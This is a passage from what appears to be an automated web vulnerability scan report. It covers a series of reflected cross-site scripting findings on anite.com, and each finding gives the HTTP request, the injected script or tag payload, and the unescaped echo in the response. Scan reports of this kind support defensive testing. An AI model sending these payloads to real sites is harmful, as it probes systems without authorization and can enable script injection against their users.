Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/91057"><script>alert(1)</script>e1eecbb3048#up">
...[SNIP]...

1.133. http://anite.com/managed-infrastructure-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/managed-infrastructure-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd7b8"><a>0cedbd6668 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /managed-infrastructure-anite.html?fd7b8"><a>0cedbd6668=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/managed-infrastructure-anite.html?fd7b8"><a>0cedbd6668=1#up">
...[SNIP]...

1.134. http://anite.com/managed-it-services-anite-plc.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/managed-it-services-anite-plc.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8259c"><a>04c50db05a7 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /managed-it-services-anite-plc.html?Itemid=2088259c"><a>04c50db05a7 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:13:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/managed-it-services-anite-plc.html?Itemid=2088259c"><a>04c50db05a7#up">
...[SNIP]...

1.135. http://anite.com/managed-it-services-anite-plc.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/managed-it-services-anite-plc.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0ed"><script>alert(1)</script>2d4bfdd08f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bf0ed"><script>alert(1)</script>2d4bfdd08f1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/bf0ed"><script>alert(1)</script>2d4bfdd08f1#up">
...[SNIP]...

1.136. http://anite.com/managed-it-services-anite-plc.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/managed-it-services-anite-plc.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bc04"><a>140b20a5581 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /managed-it-services-anite-plc.html?9bc04"><a>140b20a5581=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:13:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/managed-it-services-anite-plc.html?9bc04"><a>140b20a5581=1#up">
...[SNIP]...

1.137. http://anite.com/media/system/js/caption.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/media/system/js/caption.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54690"><script>alert(1)</script>d54ca629824 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/system/js/54690"><script>alert(1)</script>d54ca629824 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:07:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30274

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/media/system/js/54690"><script>alert(1)</script>d54ca629824#up">
...[SNIP]...

1.138. http://anite.com/media/system/js/mootools.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/media/system/js/mootools.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c784"><script>alert(1)</script>2860749f65 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/system/js/8c784"><script>alert(1)</script>2860749f65 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:08:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30273

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/media/system/js/8c784"><script>alert(1)</script>2860749f65#up">
...[SNIP]...

1.139. http://anite.com/nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc842"><a>7739a6ee0c4 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html?Itemid=429fc842"><a>7739a6ee0c4&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html?Itemid=429fc842"><a>7739a6ee0c4&nomore=true#up">
...[SNIP]...

1.140. http://anite.com/nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e07"><script>alert(1)</script>1fafe7ce82f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /90e07"><script>alert(1)</script>1fafe7ce82f HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/90e07"><script>alert(1)</script>1fafe7ce82f#up">
...[SNIP]...

1.141. http://anite.com/nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dc0b"><a>934755405c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html?9dc0b"><a>934755405c0=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-analyze-517-released-with-support-for-hspa-dual-carrier-measurements-and-lte-improvements.html?9dc0b"><a>934755405c0=1#up">
...[SNIP]...

1.142. http://anite.com/nemo-analyze-518-released-with-support-for-rasrromes-file-format.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-analyze-518-released-with-support-for-rasrromes-file-format.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1d3b"><a>d3972ce768f was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-analyze-518-released-with-support-for-rasrromes-file-format.html?Itemid=429b1d3b"><a>d3972ce768f&nomore=true HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42349

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-analyze-518-released-with-support-for-rasrromes-file-format.html?Itemid=429b1d3b"><a>d3972ce768f&nomore=true#up">
...[SNIP]...

1.143. http://anite.com/nemo-analyze-518-released-with-support-for-rasrromes-file-format.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-analyze-518-released-with-support-for-rasrromes-file-format.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c78f"><script>alert(1)</script>12ac10be59f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8c78f"><script>alert(1)</script>12ac10be59f?Itemid=429&nomore=true HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="http://anite.com/8c78f"><script>alert(1)</script>12ac10be59f?Itemid=429&nomore=true#up">
...[SNIP]...

1.144. http://anite.com/nemo-analyze-518-released-with-support-for-rasrromes-file-format.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-analyze-518-released-with-support-for-rasrromes-file-format.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad32f"><a>6c9fbe8bc80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-analyze-518-released-with-support-for-rasrromes-file-format.html?Itemid=429&nomore=true&ad32f"><a>6c9fbe8bc80=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41661

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="http://anite.com/nemo-analyze-518-released-with-support-for-rasrromes-file-format.html?Itemid=429&nomore=true&ad32f"><a>6c9fbe8bc80=1#up">
...[SNIP]...

1.145. http://anite.com/nemo-enquiry-form.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-enquiry-form.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c082f"><a>4d5f4ee64e1 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-enquiry-form.html?Itemid=483c082f"><a>4d5f4ee64e1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:12:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:12:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-enquiry-form.html?Itemid=483c082f"><a>4d5f4ee64e1#up">
...[SNIP]...

1.146. http://anite.com/nemo-enquiry-form.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-enquiry-form.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 898fb"><script>alert(1)</script>337bd22429a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /898fb"><script>alert(1)</script>337bd22429a HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
